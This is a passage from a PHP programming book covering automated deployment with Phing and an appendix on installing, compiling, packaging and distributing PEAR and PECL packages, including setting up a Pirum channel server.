There are many tools that can help you to manage database changes; some frameworks have their own, and many deployment tools also have an approach to this.
Whichever you choose, the system is only as good as the information it is given—it
relies entirely on having a full and correct set of database patches, with appropriate
patching history entries.
Automated Deployment and Phing
Throughout this section, we’ve been alluding to the idea of automating deployments,
so let’s dive into the detail now. Automated deployments need time and thought
to set up, but then they save you time and mistakes every single instance you deploy
your code after that. Think about these points:
■ How long does it take to deploy the codebase?
■ How often do we make mistakes doing this?
■ How frequently do we deploy this code?
■ How regularly would we deploy if it were quick and painless to do so?
Most project teams underestimate how long it takes them to deploy code (for fun,
estimate for your own systems and then time yourselves the next time you do it!),
as well as the cost of the mistakes that can arise in any process where more than
one thing needs to happen in the right order. Having a tried and tested deployment
process in place removes a big risk in your project and, more importantly, in its
maintenance phase, which often has a limited budget.
In its simplest form, an automated deployment system consists of a series of scripts
that perform the basic tasks. A typical script might include the following steps:
1. Tag and export code from version control
2. Compress code into tar file, transfer to server, and uncompress
3. Apply any database patches as needed
4. Create links to elements that are part of the project but reside outside of the
document root, such as upload directories, configuration files, and so on
5. Switch the symlink that the document root points to over to the new codebase
6. Empty caches and restart job servers
313
314
PHP Master: Write Cutting-edge Code
7. Go to the bar and grab a beer
There are plenty of ways you can achieve this, from hand-spun shell scripts through
to proprietary, paid-for solutions. As an example, we’ll take a look at Phing,15 a tool
written in PHP and intended for use with PHP projects. It has lots of plugins to
make common tasks painless, and also has its own database management tool, dbdeploy.
Phing uses XML-based configuration, stored by default in a file called build.xml. We
give the name of the project, and define a series of tasks that belong to this project.
We can also indicate which of these should be run by default. Here’s an example
of a simple configuration file for Phing (taken from Phing’s documentation):
<?xml version="1.0" encoding="UTF-8"?>
<project name="FooBar" default="dist">
<target name="prepare">
<echo msg="Making directory ./build" />
<mkdir dir="./build" />
</target>
<target name="build" depends="prepare">
<echo msg="Copying files to build directory..." />
<echo msg="Copying ./about.php to ./build directory..." />
<copy file="./about.php" tofile="./build/about.php" />
<echo msg="Copying ./contact.php to ./build directory..." />
<copy file="./contact.php" tofile="./build/contact.php" />
</target>
<target name="dist" depends="build">
<echo msg="Creating archive..." />
<tar destfile="./build/build.tar.gz" compression="gzip">
<fileset dir="./build">
<include name="*" />
</fileset>
</tar>
15
http://phing.info/
Quality Assurance
<echo msg="Files copied and compressed in build directory➥
OK!" />
</target>
</project>
Even in an XML format, this configuration is relatively easy to follow. We create
the project tag, and set the default target there. Then we define the targets for this
project: prepare, build, and dist. The default target is dist, and if a target depends
on other targets, those will be run first.
Storing Deployment Scripts in the Codebase
Each project will need its own build.xml file, although if you’re building similar
sites, you will probably start from the same skeleton for each. It’s good practice
to bring the deployment configuration into the codebase, since it definitely forms
part of the project. Alongside items such as the database patches, these elements
belong in the project, but outside of the document root.
To use Phing, we issue the command phing. With no arguments, this runs the default
target; alternatively, we can specify which target we want to run:
phing prepare
This would simply create the build directory, as seen in the target previously.
There are a great number of ready-made tasks for Phing, where we can just configure
the settings specifically for our server. It knows how to run unit test suites, check
coding standards, and use most of the other static analysis tools. We can also use
its exec tag to run any command line statement that we wish. This makes it infinitely
adaptable to the needs of our specific deployment process.
Ready to Deploy
In this final chapter, we covered tools from source control to coding standards,
through automating deployment and touching on the idea of continuous integration
and a build server. Every team will mix in different ingredients to achieve the right
blend for their particular projects, environment, and the individuals involved.
315
316
PHP Master: Write Cutting-edge Code
The above tools and techniques are useful in the majority of projects, and it can be
difficult to implement a lot of changes all at once. What we suggest is to look back
through the chapter and pick an element to improve or introduce first; then, in four
to six months’ time, once that element is established, return and select another, and
repeat the process.
Appendix A: PEAR and PECL
What is PEAR?
PEAR, the PHP Extension and Application Repository, is quite misnamed—it contains neither extensions, nor applications! It does, however, contain many useful
PHP components (that is, components written in PHP). These can help you do
anything from authentication to internationalization to interacting with web services.
The biggest advantage that PEAR brings to the table is a great installer for these
component packages, and any other packages created to the PEAR standard.
The PEAR package manager, found as the pear command on most systems, is really
where it starts to get awesome.
Just like a system package manager (think APT, YUM, or ports), PEAR handles both
required and optional dependencies. It can also be used to search for packages, and
even create your own.
While the pear command can be used to manage PECL packages, there’s a dedicated
pecl command that performs the same tasks for the PECL repository.
What is PECL?
PECL, the PHP Extension Community Library, is a sibling project of PEAR; it provides
PHP extensions (written in C) that can do anything from speeding up your applications to working with images. With PHP extensions being written in C, you must
have system access to install them; in shared hosting environments there’s rarely
the option to do this.
Oh, and some people pronounce it “Peckall,” while others say “Pickle.” Either way
works.
Installing Packages
The processes of installing PEAR and PECL packages should be almost identical—and
for the most part, they are. There are some extensions (such as the XHProf extension
318
PHP Master: Write Cutting-edge Code
we used in the section called “Profiling” in Chapter 6) that require you to compile
them by hand.
To install a package for PEAR, you just need to run:
$ pear install <package>
This is the simplest situation—if there is a stable package with that name, it will
just install. You can specify unstable packages simply by appending it to the file
name:
$ pear install <package>-beta
Or for a particular version:
$ pear install <package>-0.3.1
As an example, let’s install the PEAR_PackageFileManager2 package. This package
can be used to create your own packages:
$ pear install PEAR_PackageFileManager2
Did not download optional dependencies:
pear/PHP_CompatInfo, use --alldeps to download
automatically
Failed to download pear/XML_Serializer within preferred
state "stable", latest release is version 0.20.2, stability
"beta", use "channel://pear.php.net/XML_Serializer-0.20.2"
to install
pear/PEAR_PackageFileManager2 can optionally use package
"pear/PHP_CompatInfo" (version >= 1.4.0)
pear/PEAR_PackageFileManager_Plugins requires package
"pear/XML_Serializer" (version >= 0.19.0)
pear/PEAR_PackageFileManager2 requires package
"pear/PEAR_PackageFileManager_Plugins"
No valid packages found
install failed
Well, that didn’t go so well—but let’s take a look at what the installer is telling us.
Appendix A: PEAR and PECL
First, there are two required dependencies, PEAR_PackageFileManager_Plugins
and XML_Serializer. Additionally, there is an optional dependency, PHP_CompatInfo.
Second, because of the default settings, the PEAR installer will refuse to install
anything less than stable. The XML_Serializer package is beta (see the section called
“Package Versioning”). To install it, we can either change our settings, or manually
install it.
To review our configuration, we use the config-show command. To change it, we
use the config-set command like so:
$ pear config-set preferred_state beta
config-set succeeded
Or, we can install the package by hand:
$ pear install XML_Serializer-beta
downloading XML_Serializer-0.20.2.tgz ...
Starting to download XML_Serializer-0.20.2.tgz (35,634 bytes)
.....done: 35,634 bytes
downloading XML_Parser-1.3.4.tgz ...
Starting to download XML_Parser-1.3.4.tgz (16,040 bytes)
...done: 16,040 bytes
install ok: channel://pear.php.net/XML_Parser-1.3.4
install ok: channel://pear.php.net/XML_Serializer-0.20.2
As you can see, this also installs the XML_Parser dependency.
Now we have this issue resolved, let’s try to install PEAR_PackageFileManager2
again; this time, we’ll include all optional dependencies:
pear install --alldeps PEAR_PackageFileManager2
Unknown remote channel: pear.phpunit.de
pear/PHP_CompatInfo can optionally use package "channel://➥
pear.phpunit.de/PHPUnit" (version >= 3.2.0)
downloading PEAR_PackageFileManager2-1.0.2.tgz ...
Starting to download PEAR_PackageFileManager2-1.0.2.tgz➥
(43,251 bytes)
............done: 43,251 bytes
downloading PEAR_PackageFileManager_Plugins-1.0.2.tgz ...
…
319
320
PHP Master: Write Cutting-edge Code
install ok: channel://pear.php.net/PEAR_PackageFileManager➥
_Plugins-1.0.2
install ok: channel://pear.php.net/Console_Table-1.1.4
install ok: channel://pear.php.net/Console_Getargs-1.3.5
install ok: channel://pear.php.net/File_Find-1.3.1
install ok: channel://pear.php.net/Event_Dispatcher-1.1.0
install ok: channel://pear.php.net/XML_Beautifier-1.2.2
install ok: channel://pear.php.net/Console_ProgressBar-0.5.2beta
install ok: channel://pear.php.net/Var_Dump-1.0.4
install ok: channel://pear.php.net/Console_Color-1.0.3
install ok: channel://pear.php.net/HTML_Common-1.2.5
install ok: channel://pear.php.net/PEAR_PackageFileManager2-1.0.2
install ok: channel://pear.php.net/PHP_CompatInfo-1.9.0
install ok: channel://pear.php.net/HTML_Table-1.8.3
This time, a whole bunch of packages were installed successfully. We can find this
code in the directory specified by the php_dir in our pear configuration.
But what’s this unknown remote channel? What does that even mean? PEAR
channels—introduced over six years ago—offer a way to set up your own package
server, as well as use other people’s package servers. For example, the Symfony,
PHPUnit, Twig, Horde, Phing, and Amazon Web Services projects all provide their
packages for install via a pear channel. PEAR packages can depend on packages
from other channels.
PEAR Channels
To use a channel, we must first tell the pear command about it:
$ pear channel-discover pear.phpunit.de
Adding Channel "pear.phpunit.de" succeeded
Discovery of channel "pear.phpunit.de" succeeded
If we then run the channel-info command, it’ll tell us everything we need to know
about the channel:
$ pear channel-info pear.phpunit.de
Channel pear.phpunit.de Information:
====================================
Name and Server
pear.phpunit.de
Alias
phpunit
Summary
PHPUnit PEAR Channel
Appendix A: PEAR and PECL
Validation Package Name PEAR_Validate
Validation Package
default
Version
Server Capabilities
===================
Type Version/REST type Function Name/REST base
rest REST1.0
http://pear.phpunit.de/rest/
rest REST1.1
http://pear.phpunit.de/rest/
rest REST1.2
http://pear.phpunit.de/rest/
rest REST1.3
http://pear.phpunit.de/rest/
The most useful part of this is the Alias, in this case phpunit. You can use phpunit
in place of the channel URL in any command that takes a channel as an argument,
or when specifying package names.
Packages can depend on other packages on other channels. Consequently, we can
tell the pear command to automatically discover the channels the dependencies
live on by setting the auto_discover setting to 1:
$ pear config-set auto_discover 1
config-set succeeded
Now that we’ve done this, we can see the packages the phpunit channel offers, and
install them:
$ pear list-all -c phpunit
All packages [Channel phpunit]:
===============================
Package
Latest Local
phpunit/bytekit
1.1.1
A command-line tool built➥
on the PHP Bytekit➥
extension.
phpunit/DbUnit
1.0.2
DbUnit port for PHP/PHPUnit.
phpunit/File_Iterator
1.2.6
FilterIterator➥
implementation that➥
filters files based➥
on a list of➥
suffixes.
phpunit/Object_Freezer
1.0.0
Library that faciliates➥
PHP object stores.
phpunit/phpcpd
1.3.2
Copy/Paste Detector (CPD)➥
for PHP code.
321
322
PHP Master: Write Cutting-edge Code
phpunit/phpdcd
0.9.2
phpunit/phploc
1.6.1
phpunit/phpUnderControl
phpunit/PHPUnit
0.5.0
3.5.14
phpunit/PHPUnit_MockObject 1.0.9
phpunit/PHPUnit_Selenium
1.0.3
phpunit/PHP_CodeBrowser
1.0.0
phpunit/PHP_CodeCoverage
1.0.4
phpunit/PHP_Timer
phpunit/PHP_TokenStream
1.0.0
1.0.1
phpunit/ppw
phpunit/test_helpers
1.0.4
1.1.0
phpunit/Text_Template
1.1.0
Dead Code Detector (DCD)➥
for PHP code.
A tool for quickly➥
measuring the size➥
of a PHP project.
CruiseControl addon for PHP
Regression testing➥
framework for unit tests.
Mock Object library for➥
PHPUnit
Selenium RC integration➥
for PHPUnit
PHP_CodeBrowser for➥
integration in Hudson➥
and CruiseControl
Library that provides➥
collection, processing,➥
and rendering➥
functionality➥
for PHP code coverage➥
information.
Utility class for timing
Wrapper around PHP's➥
tokenizer extension.
PHP Project Wizard (PPW)
An extension for the PHP➥
Interpreter to ease➥
testing of PHP code.
Simple template engine.
Notice how all the packages are prepended with phpunit/? This is the channel
alias and the package namespace, and it allows us to disambiguate between similarly
named packages on separate channels.
We can find more information about a package by using the remote-info command:
$ pear remote-info phpunit/PHPUnit
Package details:
================
Latest
3.5.14
Installed
- no Package
PHPUnit
License
BSD License
Category
Default
Appendix A: PEAR and PECL
Summary
Regression testing framework for unit tests.
Description PHPUnit is a regression testing framework used
by the developer who implements unit tests in
PHP. This is the version to be used with PHP 5.
Now let’s install the phpunit/PHPUnit package:
pear install phpunit/PHPUnit
Attempting to discover channel "pear.symfony-project.com"...
downloading channel.xml ...
Starting to download channel.xml (865 bytes)
....done: 865 bytes
Auto-discovered channel "pear.symfony-project.com", alias➥
"symfony", adding to registry
Attempting to discover channel "components.ez.no"...
downloading channel.xml ...
Starting to download channel.xml (591 bytes)
...done: 591 bytes
Auto-discovered channel "components.ez.no", alias "ezc", adding➥
to registry
Did not download optional dependencies: channel://➥
components.ez.no/ConsoleTools, use --alldeps to download➥
automatically
phpunit/PHPUnit can optionally use PHP extension "dbus"
downloading PHPUnit-3.5.14.tgz ...
Starting to download PHPUnit-3.5.14.tgz (118,697 bytes)
...done: 118,697 bytes
…
install ok: channel://pear.symfony-project.com/YAML-1.0.6
install ok: channel://components.ez.no/Base-1.8
install ok: channel://pear.phpunit.de/DbUnit-1.0.2
install ok: channel://components.ez.no/ConsoleTools-1.6.1
install ok: channel://pear.phpunit.de/PHP_TokenStream-1.0.1
install ok: channel://pear.phpunit.de/PHP_CodeCoverage-1.0.4
install ok: channel://pear.phpunit.de/PHPUnit-3.5.14
As you can see here, we automatically discovered both the Symfony and ezComponents channels, and installed dependencies from both alongside those from the
phpunit channel.
Channels are another significant feature of PEAR; they provide the ability to handle
your own code distribution, deployment, and dependencies with a private channel,
323
324
PHP Master: Write Cutting-edge Code
and with the ease of cross-channel dependencies, you can even include third-party
code.
Using PEAR Code
To utilize PEAR code, first you must understand how it’s structured. You’ve probably
run into this structure—perhaps you even already use it.
The PEAR naming scheme is considered a de facto standard for PHP. That’s not to
say it’s the only standard, but it certainly has the most traction. If you had to learn
one standard, this is the one you’d want. The PEAR standard has been taken up by
many other projects including PHPUnit, Zend Framework, eZ Components,1 and
Horde.
The naming scheme is easy: underscores = directories. That is, a class named
PEAR_PackageFileManager2 can be found in the
installdir/PEAR/PackageFileManager2.php file. To use PEAR in your project, simply
include the php_dir in your include_path, and then you can include it in your
code:
require_once 'PEAR/PackageFileManager2.php';
$pfm = new PEAR_PackageFileManager2(…);
// Use the class here
This simple rule also makes it easy to autoload the classes:
function __autoload($class_name)
{
$class_path = str_replace('_', DIRECTORY_SEPARATOR, $class_name)➥
. '.php';
require_once $class_path;
}
Installing Extensions
So installing PEAR packages is easy, but what about extensions? Mostly, just as
easy:
1
http://ezcomponents.org/
Appendix A: PEAR and PECL
$ pear install xdebug
No releases available for package "pear.php.net/xdebug" package pecl/xdebug can be installed with "pecl install xdebug"
install failed
Trying to use the pear command fails, however; this is because we must use the
pecl command instead. This command is functionally identical to the pear command
in almost every way:
$ pecl install xhprof
downloading xhprof-0.9.2.tgz ...
Starting to download xhprof-0.9.2.tgz (931,660 bytes)
...........................................................
...........................................................
...done: 931,660 bytes
11 source files, building
running: phpize
Configuring for:
⋮
As you can see, this grabs the PECL package, and starts to compile it for you. Once
the compilation is done, you’ll see a message like this:
Build process completed successfully
Installing '/usr/lib/php/extensions/no-debug-non-zts-20090626/➥
xhprof.so'
install ok: channel://pecl.php.net/xhprof-0.9.2
configuration option "php_ini" is not set to php.ini location
You should add "extension=xhprof.so" to php.ini
This indicates that the extension itself was installed to the directory (on our system,
this may differ on yours): /usr/lib/php/extensions/no-debug-non-zts-20090626. This
is the directory that should be set as the extension_dir in your php.ini.
Should you see the last two lines, and you want the pecl command to automatically
update your php.ini file with the required extension= line, you can tell it the location
of your php.ini file by running:
$ pecl config-set php_ini /path/to/php.ini
config-set succeeded
325
326
PHP Master: Write Cutting-edge Code
Compiling Extensions by Hand
There might come a time when you want to install an extension either from PECL,
or from other sources (such as one distributed with PHP itself) by hand. This is
quite easily accomplished. To do this, first download the package by hand from the
PECL website:2
$ wget http://pecl.php.net/get/xdebug
--2011-07-31 04:05:00-- http://pecl.php.net/get/xdebug
Resolving pecl.php.net... 76.75.200.106
Connecting to pecl.php.net|76.75.200.106|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 304229 (297K) [application/octet-stream]
Saving to: `xdebug'
100%[======================================================
===========================================================
=================================================>] 304,229
400K/s
in 0.7s
2011-07-31 04:05:01 (400 KB/s) - 'xdebug' saved
[304229/304229]
If you don’t want to use Wget (or a tool such as cURL), just download the file in
your browser.
Next, unpack the file that is a gzipped tarball. We do this using the tar command,
with the following flags:
■ -z: uncompress with gzip first
■ -x: unpack the files
■ -v: show the filenames as they are unpacked
■ -f xdebug: specify the filename to unpack (in this case, xdebug)
$ tar -zxvf xdebug
…
2
http://pecl.php.net/
Appendix A: PEAR and PECL
Once this is done, we must locate the sources. For most packages, these are found
in the top-level directory. Others—such as XHProf—place them in a subdirectory.
Once we’ve located the sources, we must begin the process of compiling.
This process has five steps:
1. Set up the sources for compilation with phpize.
2. Configure the compilation with configure.
3. Compile the code with make.
4. Install the code with make install.
5. Enable the extension in your php.ini.
We’ll walk through each of these with Xdebug:
$ cd xdebug-2.1.2
$ phpize
Configuring for:
PHP Api Version:
Zend Module Api No:
Zend Extension Api No:
20090626
20090626
220090626
These numbers indicate the precise versions of PHP that we’re configuring for. PHP
has an internal API which does not (in theory) change between PHP versions. As
we can see, the current version is from 2009.
Next, we must configure the compile. We do this by calling configure and supplying
the --enable-xdebug flag. Each extension will have its own flags; you can use
configure --help to check what is appropriate:
$ ./configure --enable-xdebug
checking for grep that handles long lines and -e... /usr/bin/grep
checking for egrep... /usr/bin/grep -E
checking for a sed that does not truncate output... /usr/bin/sed
checking for cc... cc
⋮ lots more output here
creating libtool
appending configuration tag "CXX" to libtool
configure: creating ./config.status
config.status: creating config.h
327
328
PHP Master: Write Cutting-edge Code
The configure script checks that all build dependencies are met, and creates the
“recipe” from which the compiler command make will read, known as the Makefile.
Now let’s compile:
$ make
⋮ lots of compiler output here
--------------------------------------------------------------Libraries have been installed in:
/Users/davey/src/xdebug-2.1.2/modules
If you ever happen to want to link against installed libraries
in a given directory, LIBDIR, you must either use libtool, and
specify the full pathname of the library, or use the `-LLIBDIR'
flag during linking and do at least one of the following:
- add LIBDIR to the `DYLD_LIBRARY_PATH' environment variable
during execution
See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
---------------------------------------------------------------Build complete.
Don't forget to run 'make test'.
The last line indicates an optional command we can run—make test—to run unit
tests. However, this is just a holdover from the main PHP compile, and will fail to
work in this context; ignore it.
At this point, you can copy the extension from the indicated installation directory
to the PHP extension_dir. It’s best, however, to have make do this for you, as there
may be more than a simple copy involved:
$ make install
Installing shared extensions:
/usr/lib/php/extensions/no-debug-non-zts-20090626/
At this point, you just need to edit your php.ini and add the appropriate configuration
lines. For most extensions, this is simply:
extension=extension_name.so
Appendix A: PEAR and PECL
However, for some tools like Xdebug, it must be set up as a zend_extension—these
extensions are upon the engine itself, and included at a different part of the execution
cycle. In the case of Xdebug, as a profiler it needs access to the engine itself to track
information about the execution of your code. These must be enabled using the full
path; otherwise, they won’t be found:
zend_extension=/usr/lib/php/extensions/no-debug-non-zts-20090626/➥
xdebug.so
That’s it. Obviously, using the pecl command is far easier, but sometimes you just
have to get your hands dirty.
Knowing how to do this also enables you to compile extensions from the PHP source
without having to recompile your entire PHP install. Just enter the directory for the
appropriate extension—/php-version/ext/extensionname—and follow the same process.
Creating Packages
So, now you want to create your own packages. Using the PEAR_PackageFileManager2 we installed earlier (you did install it, right?), it’s as easy as pie. This package
is capable of reading and (more importantly) writing PEAR package.xml files. This
file tells the pear command how to package up a compatible tarball for release.
Before we go ahead and create one, let’s first see what it’s made of:
appendix_01/package.xml
<?xml version="1.0" encoding="UTF-8"?>
<package packagerversion="1.9.4" version="2.0"
xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
http://pear.php.net/dtd/package-2.0.xsd">
<name>Url_Shortener</name>
<channel>pear.php.net</channel>
<summary>Shorten URLs with a variety of services.</summary>
<description>Url_Shortener will let you shorten URLs with
Bit.ly, is.gd or Tinyurl</description>
329
330
PHP Master: Write Cutting-edge Code
<lead>
<name>Davey Shafik</name>
<user>dshafik</user>
<email>me@daveyshafik.com</email>
<active>yes</active>
</lead>
<date>2011-07-31</date>
<time>21:51:29</time>
<version>
<release>0.1.0</release>
<api>0.1.0</api>
</version>
<stability>
<release>alpha</release>
<api>alpha</api>
</stability>
<license uri="http://creativecommons.org/licenses/bysa/3.0/">Creative Commons Attribution-ShareAlike 3.0
Unported License</license>
<notes>
This is the first release of the Url_Shortener package
</notes>
<contents>
<dir baseinstalldir="Url" name="/">
<file baseinstalldir="Url"
md5sum="d41d8cd98f00b204e9800998ecf8427e"
name="Shortener/Bitly.php" role="php" />
<file baseinstalldir="Url"
md5sum="d41d8cd98f00b204e9800998ecf8427e"
name="Shortener/Interface.php" role="php" />
<file baseinstalldir="Url"
md5sum="d41d8cd98f00b204e9800998ecf8427e"
name="Shortener/Isgd.php" role="php" />
<file baseinstalldir="Url"
md5sum="d41d8cd98f00b204e9800998ecf8427e"
name="Shortener/Tinyurl.php" role="php" />
<file baseinstalldir="Url"
md5sum="d41d8cd98f00b204e9800998ecf8427e"
name="Shortener.php" role="php" />
</dir>
</contents>
<dependencies>
<required>
<php>
<min>5.3.6</min>
Appendix A: PEAR and PECL
</php>
<pearinstaller>
<min>1.4.0</min>
</pearinstaller>
<package>
<name>pecl_http</name>
<channel>pecl.php.net</channel>
<min>1.7.0</min>
<recommended>1.7.1</recommended>
<providesextension>pecl_http</providesextension>
</package>
</required>
</dependencies>
<phprelease />
<changelog>
<release>
<version>
<release>0.1.0</release>
<api>0.1.0</api>
</version>
<stability>
<release>alpha</release>
<api>alpha</api>
</stability>
<date>2011-07-31</date>
<license uri="http://creativecommons.org/licenses/bysa/3.0/">Creative Commons Attribution-ShareAlike 3.0
Unported License</license>
<notes>
This is the first release of the Url_Shortener package
</notes>
</release>
</changelog>
</package>
This somewhat lengthy file tells the pear command several important items:
■ package name
■ package channel
■ version of the package
■ dependencies for the package
It also includes the file list, as well as the changelog for all previous releases.
331
332
PHP Master: Write Cutting-edge Code
To generate this file, a basic script can be used:
appendix_01/packager.php
// Include PEAR_PackageFileManager2
require_once 'PEAR/PackageFileManager2.php';
// Instantiate the class
$package = new PEAR_PackageFileManager2();
// Set some default settings
$package->setOptions(array(
'baseinstalldir' => 'Url',
'packagedirectory' => dirname(__FILE__) . '/Url',
));
// Set the Package Name
$package->setPackage('Url_Shortener');
// Set a package summary
$package->setSummary('Shorten URLs with a variety of services.');
// Set a lengthier description
$package->setDescription('Url_Shortener will let you shorten URLs➥
with Bit.ly, is.gd or Tinyurl');
// We don't have a channel yet, but a valid one is required so➥
just use pear.
$package->setChannel('pear.php.net');
// Set the Package version and stability
$package->setReleaseVersion('0.1.0');
$package->setReleaseStability('alpha');
// Set the API version and stability
$package->setApiVersion('0.1.0');
$package->setApiStability('alpha');
// Add Release Notes
$package->setNotes('This is the first release of the Url_Shortener➥
package');
// Set the package type (This is a PEAR-style PHP package)
$package->setPackageType('php');
Appendix A: PEAR and PECL
// Add a release section
$package->addRelease();
// Add the pecl_http extension as a dependency
$package->addPackageDepWithChannel('required', 'pecl_http',➥
'pecl.php.net', '1.7.0', false, '1.7.1', false, 'pecl_http');
// Add a maintainer
$package->addMaintainer('lead', 'dshafik', 'Davey Shafik',➥
'me@daveyshafik.com');
// Set the minimum PHP version on which the code will run
$package->setPhpDep('5.3.6');
// Set the minimum PEAR install requirement
$package->setPearinstallerDep('1.4.0');
// Add a license
$package->setLicense('Creative Commons Attribution-ShareAlike 3.0➥
Unported License', 'http://creativecommons.org/licenses/➥
by-sa/3.0/');
// Generate the File list
$package->generateContents();
// Write the XML to file
$package->writePackageFile();
The most important lines here (and the ones you will be modifying on a regular
basis) are the calls to setReleaseVersion() and setNotes()—by updating these,
and rerunning the script, you will update the package.xml for a new release.
The function calls to know are:
■ setPackage(), which sets the package name
■ setReleaseVersion(), which sets the current release version
■ setReleaseStability(), which sets the release stability (dev, alpha, beta, stable)
■ setNotes(), which sets the changelog notes
The final step is calling the pear package command, which will create the actual
release package:
333
334
PHP Master: Write Cutting-edge Code
$ pear package Url/package.xml
Analyzing Shortener/Bitly.php
Analyzing Shortener/Interface.php
Analyzing Shortener/Isgd.php
Analyzing Shortener/Tinyurl.php
Analyzing Shortener.php
Package Url_Shortener-0.1.0.tgz done
Once this is done, you can hand the package to anyone to install using the pear
install command:
$ pear install Url_Shortener-0.1.0.tgz
downloading pecl_http-1.7.1.tgz ...
Starting to download pecl_http-1.7.1.tgz (174,098 bytes)
.....................................done: 174,098 bytes
71 source files, building
running: phpize
Configuring for:
⋮
Installing '/usr/lib/php/extensions/no-debug-non-zts-20090626/➥
http.so'
install ok: channel://pecl.php.net/pecl_http-1.7.1
install ok: channel://pear.php.net/Url_Shortener-0.1.0
How cool is that? That itty bitty script, and we’ve automated the installation of our
package and its dependencies—and not just any dependency, but a compiled PHP
extension!
Package Versioning
PEAR has a very well-defined (and again, de facto standard) versioning scheme for
packages. A package version has two components: the version number, and the
package stability; you will often see this expressed as 0.2.0-dev or 1.5.1-stable.
The version number consists of three parts expressed in an X.Y.Z format: Major.Minor.Micro. These three parts are incremented as follows:
■ Major: when backwards-incompatible changes occur
■ Minor: when features are added
Appendix A: PEAR and PECL
■ Micro: bug fix (only) releases
In addition to these taxonomies, there are four designated stability monikers:
■ dev: totally broken
■ alpha: still quite broken
■ beta: might be broken
■ stable: shouldn’t be broken
The last (stable) is optional in a version number, and is assumed when no other
moniker is specified. As a matter of note, there is a fifth state: RC, which stands for
Release Candidate—a version with the potential to be a final product, but which
may still have a few bugs. RC status can be achieved by setting a beta state and appending RC and a sequential number to the version number, such as 1.0.0RC1.
This is all best illustrated with an example, so let’s take a look at our Url_Shortener
in this context:
0.1.0-dev
the initial release
0.2.0-dev
still fairly broken, but change is definitely happening
0.2.1-dev
fixed a bug and pushed it out
0.3.0-alpha
the package is now unlikely to break backwards compatibility
0.4.0-beta
the package is now quite stable, but there’s still a small percentage of backwardsincompatible changes
1.0.0RC1
the package is now very unlikely to break backwards compatibility
1.0.0RC2
a critical bug was found in RC1 and fixed
335
336
PHP Master: Write Cutting-edge Code
1.0.0
the package is now stable, and backwards-incompatible changes are no longer
allowed
1.0.1
bug fix release
1.1.0
new features added
2.0.0-dev
a backwards-incompatible change was added and we start over again …
As you can see, adhering to this version scheme makes releases predictable, and
also gives consumers the ability to intelligently figure out what a new package version might entail.
Creating a Channel
So now you have a bunch of cool packages, and you want to distribute them to your
adoring fans: it’s time to set up your own PEAR channel server. This is much easier
than it might seem, thanks to the efforts of the Pirum Project. Pirum is a simple
(static) channel server, available (predictably) via the Pirum PEAR channel.
First, let’s install Pirum:
$ pear channel-discover pear.pirum-project.org
Adding Channel "pear.pirum-project.org" succeeded
Discovery of channel "pear.pirum-project.org" succeeded
$ pear install pirum/Pirum
downloading Pirum-1.0.2.tgz ...
Starting to download Pirum-1.0.2.tgz (12,538 bytes)
.....done: 12,538 bytes
install ok: channel://pear.pirum-project.org/Pirum-1.0.2
Next, test your install by running the pirum command:
$ pirum
Pirum 1.0.2 by Fabien Potencier
Available commands:
Appendix A: PEAR and PECL
pirum build target_dir
pirum add target_dir Pirum-1.0.0.tgz
pirum remove target_dir Pirum-1.0.0.tgz
Once we have this, we must create a pirum.xml file, and this file must reside in the
root of your channel directory. The pirum.xml file is simple, containing the channel
name, alias, a brief description, and the channel URL. For example, if we want to
create a local testing channel server at pear.local, we can use the following:
<?xml version="1.0" encoding="UTF-8" ?>
<server>
<name>pear.local</name>
<summary>My Local PEAR channel</summary>
<alias>local</alias>
<url>http://pear.local/</url>
</server>
We’ll place this file in the /Library/WebServer/Documents/pear.local directory.
Now just call the build command, and Pirum will create our channel server, including a friendly HTML page from which users can gain an overview of the channel
and its packages:
$ pirum build /Library/WebServer/Documents/pear.local
Pirum 1.0.2 by Fabien Potencier
Available commands:
pirum build target_dir
pirum add target_dir Pirum-1.0.0.tgz
pirum remove target_dir Pirum-1.0.0.tgz
Running the build command:
INFO
Building channel
INFO
Building maintainers
INFO
Building categories
INFO
Building packages
INFO
Building releases
INFO
Building index
INFO
Building feed
INFO
Updating PEAR server files
INFO
Command build run successfully
337
338
PHP Master: Write Cutting-edge Code
If you now look inside the pear.local directory, you’ll see a number of files necessary
for the pear command to use to interact with the server. The most important of
these files is channel.xml, which is what the pear command will retrieve to understand the capabilities of the channel server.
All we need to do now is set up a simple VirtualHost, and we’re ready to go:
<VirtualHost *:80>
ServerName pear.local
DocumentRoot /Library/WebServer/Documents/pear.local
</VirtualHost>
To check out what Pirum has done for us, load pear.local in your favorite browser,
and you’ll see a page similar to Figure A.1.
Figure A.1. Setting up your PEAR channel using Pirum is easy
As an observant individual, I’m sure you noticed that there are no packages listed.
To add a package, we must first repackage it for our channel. To do this, PEAR must
discover the channel:
Appendix A: PEAR and PECL
$ pear channel-discover pear.local
Adding Channel "pear.local" succeeded
Discovery of channel "pear.local" succeeded
You can see our channel is working just fine! Let’s recreate our package. First, we
have to update our packager.php script and change the following:
$package->setChannel('pear.php.net');
// becomes:
$package->setChannel('pear.local');
Next, run the packager again:
$ php packager.php
Analyzing Shortener/Bitly.php
Analyzing Shortener/Interface.php
Analyzing Shortener/Isgd.php
Analyzing Shortener/Tinyurl.php
Analyzing Shortener.php
And finally, package the new version:
$ pear package Url/package.xml
Analyzing Shortener/Bitly.php
Analyzing Shortener/Interface.php
Analyzing Shortener/Isgd.php
Analyzing Shortener/Tinyurl.php
Analyzing Shortener.php
Package Url_Shortener-0.2.0.tgz done
Now that we have our new package, let’s add it to our PEAR channel using the
pirum add command:
$ pirum add ./ /path/to/Url_Shortener-0.2.0.tgz
Pirum 1.0.2 by Fabien Potencier
Available commands:
pirum build target_dir
pirum add target_dir Pirum-1.0.0.tgz
pirum remove target_dir Pirum-1.0.0.tgz
Running the add command:
INFO
Parsing package 0.2.0 for Url_Shortener
339
340
PHP Master: Write Cutting-edge Code
INFO
INFO
INFO
INFO
INFO
INFO
INFO
INFO
INFO
INFO
INFO
INFO
Building channel
Building maintainers
Building categories
Building packages
Building package Url_Shortener
Building releases
Building releases for Url_Shortener
Building release 0.2.0 for Url_Shortener
Building index
Building feed
Updating PEAR server files
Command add run successfully
